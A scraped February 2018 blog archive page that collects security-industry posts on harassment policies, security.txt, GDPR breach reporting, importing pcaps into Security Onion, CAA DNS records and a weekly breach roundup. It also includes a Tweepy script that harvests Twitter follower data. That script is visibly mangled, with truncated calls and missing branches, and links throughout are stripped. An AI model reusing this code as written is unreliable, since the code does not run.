Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that they are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post #MeToo Prompts Employers to Review their Anti-Harassment Policies appeared first on .

Implement “security.txt” to advocate responsible vuln. disclosures


After discussing CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's a matter of time that someone finds an issue with your web-presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under the wrap, or disclose it to you "responsibly"? This article is for you if you advocate the responsible disclosure; else, you have to do catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended), social media, or would be struggling to find a secure channel. But, what if you have a way to broadcast your "security channel" details to ease out their communication, and provide them with a well documented, managed and sought out conversation channel? Isn't that cool? Voila, so what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?." But, where would you host this page - under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve - standardize the file, path and it's presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very well advocates that you take security seriously, and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or a security issue with your website/ application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As the security.txt follows a standard here are some points to consider,

  • The file security.txt has to be placed in .well-known directory under your domain parent directory, i.e.
  • It documents the following fields,
    • Comments: The file can have information in the comment section that is optional. The comments shall begin with # symbol.
    • Each separate field needs a new line to define and represent.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: tel:+1-201-555-0123
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key, but a URI to the key-file.
    • Signature: If you want to show the file integrity, you can use this directive to link to the signature of the file. Each of the signature files must be named as security.txt.sig and accessible at /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This derivative can be used to acknowledge the previous researchers, and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then, this is the place you post.

A reference security.txt extracted from Google,


Hope this articles gives you an idea of implementing security.txt file, and the very importance of it.

Stay safe!

  1. Early drafted posted for RFC review: ↩︎

  2. Google security.txt file: ↩︎

  3. Uniform Resource Identifier: ↩︎

Luxembourg DPA Publishes Data Breach Reporting Form

On February 12, 2018, the Luxembourg data protection authority (Commission nationale pour la protection des donées, “CNPD”) published on its website (in English and French) a form to be used for the purpose of compliance with data breach notification requirements applicable under the EU General Data Protection Regulation (the “GDPR”). The CNPD also published questions and answers (“Q&As”) regarding the requirements.

Pursuant to the GDPR, data controllers must notify the competent supervisory authority of a data breach within 72 hours of becoming aware of it, if the breach is likely to result in a risk to the rights and freedoms of individuals. Though breach notification is currently not required under the EU Data Protection Directive 95/46/EC, the CNPD has already published the form to assist companies with breach reporting prior to the GDPR coming into force.

For the time being, breach notifications can be sent to Alternative methods are currently under discussion. Notifications will be processed by the CNPD informally until the GDPR becomes directly applicable. Upon receipt, the CNPD will send an acknowledgement of receipt to the data controller, review the form, verify its authenticity and ask the controller any relevant questions, if necessary.

The form provides a series of questions for affected organizations, which are designed to incorporate the requirements of Article 33 of the GDPR. Organizations are not strictly required to use the exact form prepared by the CNPD, but must ensure that any form they do use complies with Article 33 of the GDPR.

In its Q&As, the CNPD also explains that data controllers must document any privacy breach, even those that are not reported to the CNPD. Such documentation must include the facts surrounding the breach, its impact and measures taken to mitigate them. The CNPD may request access to such documentation.

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name an be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(userids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime, date, time, timedelta
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
            with, "r", encoding="utf-8") as f:
                ret = json.load(f)
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    load_fn = None
    save_fn = None
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match =, time_string)
    if match is not None:
        first_bit =
        second_bit =
        last_bit =
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / 100
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")


    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print("\t\tFollower age ranges")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print("\t\tMost common friends counts")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump


Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:


Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts. However, not in as large of a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account. And we’re not. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump, and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts.)

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s full list of those articles.

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in Equity, Morphisec raised $12M in Series B, & Dover Microsystems raised $6M "Seed" Round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Pre-Crime: It’s Not Just Science Fiction Anymore

In Philip K. Dick’s 1956 “The Minority Report,” murder was eradicated due to the “Pre-Crime Division,” which anticipated and prevented crime before it happened. Sixty years later, elements of pre-crime cybersecurity technology are already in place. But how do we toe the line between safety and Big Brother? This panel will discuss the history of predictive analytics, privacy implications of monitoring and how AI/machine learning will shape society in the future. 


Joe Brown, Editor in Chief of Popular Science

Dr. Richard Ford, Chief Scientist at Forcepoint
Jennifer Lynch, Senior Staff Attorney, Civil Liberties at EFF
David Brin, Scientist, Futurist and Author

Dr. Richard Ford, Forcepoint Chief Scientist

Session location

Farimont Hotel - Manchester EFG

Session Address

101 Red River, Austin, TX,78701


Wednesday, March 14, 2018 -
14:00 - 15:00

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years, there has not been a way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 ( ISO) or later. Next I downloaded the script using wget from

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap


Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29

Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to include those in the trace.

Here's another screenshot. Again I had to adjust for the proper time range.

Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap


Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:

The alerts show up in Sguil, too!

This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running on an evaluation system, probably in a virtual machine. I did all my testing on Virtual Box. Check it out! 

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.


Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed due to the ID numbers for some individuals being the same as their Social Security numbers and those ID numbers being shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information posted online when an attachment containing a list of individuals who had made submissions to the review of City of Ballarat’s CBD Car Parking Action Plan was posted online unredacted. Chase said that a “glitch” led to some customers’ personal information being displayed on other customers’ accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


The U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues last week.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that there was reluctant support from democrats on the commission who were calling for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to it’s untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme ( The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I audited someone's DNS file but recently while checking a client's DNS configuration I was surprised that the CAA records were set randomly "so to speak". I discussed with the administrator and was surprised to see that he has no clue of CAA, how it works and why is it so important to enable it correctly. That made me wonder, how many of us actually know that; and how can it be a savior if someone attempts to get SSL certificate for your domain.

What is CAA?

CAA or Certificate Authority Authorization is a record that identifies which CA (certificate authorities) are allowed to issue certificate for the domain in question. It is declared via CAA type in the DNS records which is publicly viewable, and can be verified before issuing certificate by a certificate authority.

Brief Background

While the first draft was documented by Phillip Hallem-Baker and Rob Stradling back in 2010, it accelerated the work in last 5 years due to issues with CA and hacks around. The first CA subversion was in 2001 when VeriSign issued 2 certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificate(s) could have been used to spoof identity, and providing malicious updates etc. Further in 2011 fraudelent certificates were issued by Comodo[1] and DigiNotar[2] after being attacked by Iranian hackers (more on Comodo attack, and dutch DigiNotar attack); an evidence of their use in a MITM attack in Iran.

Further in 2012 Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So, it's time CA are restricted or whitelisted at domain level.

What if no CAA record is configured in DNS?

Simply put the CAA record shall be configured to announce which CA (certificate authorities) are permitted to issue a certificate for your domain. Wherein, if no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice to restrict your CA presence, and their power(s) to legally issue certificate for your domain. It's like whitelisting them in your domain!

The process mandates a Certificate Authority[4] (yes, it mandates now!) to query DNS for your CAA record, and the certificate can only be issued for your hostname, if either no record is available, or this CA has been "whitelisted". The CAA record enables the rules for the parent domain, and the same are inherited by sub-domains. (unless otherwise stated in DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value> and has the following meaning,

Tag Name Usage
flag This is an integer flag with values 1-255 as defined in the RFC 6844[6]. It is currently used to call the critical flag.[7]
tag This is an ASCII string (issue, issuewild, iodef) which identifies the property represented by the record policy.
value The value of the property defined in the <tag>

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a "single certificate authority" to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a "single certificate authority" to issue only a wildcard certificate for the domain in scope.
  • iodef: certificate authorities will report the violations accordingly if the certificate is issued, or requested that breach the CAA policy defined in the DNS records. (options: mailto:, http:// or https://)
DNS Software Support

As per excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B),Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured that ONLY "" but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well,

  • 0 issue ""
  • 0 issue ""
  • 0 issue ""
  • 0 issuewild ""
  • 0 issuewild ""
  • 0 issuewild ""

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Also, configured iodef for violation: 0 iodef ""

How's the WWW doing with CAA?

After the auditing exercise I was curious to know how are top 10,000 alexa websites doing with CAA and strangely enough I was surprised with the results: only 4% of top 10K websites have CAA DNS record.

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

Now, we have still a long way to go with new security flags and policies like "CAA DNS Record", "security.txt" file etc. and I shall be covering these topics continuously to evangelize security in all possible means without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.

  1. Comodo CA attack by Iranian hackers: ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: ↩︎

  3. Trustwave Subroot Certificate: ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: ↩︎

  5. Wikipedia Article: ↩︎

